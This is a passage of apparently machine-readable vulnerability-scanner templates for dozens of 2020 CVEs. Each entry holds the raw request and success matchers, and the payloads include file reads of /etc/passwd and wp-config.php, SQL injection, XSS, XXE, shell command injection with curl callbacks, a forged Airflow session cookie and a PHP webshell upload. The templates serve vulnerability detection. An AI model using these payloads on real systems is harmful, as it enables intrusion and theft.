HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-29284","info":{"name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6"]},{"type":"word","part":"body","words":["Restaurent Tables","Chair List"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["d03c180355b797069cc047ff5606d689"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 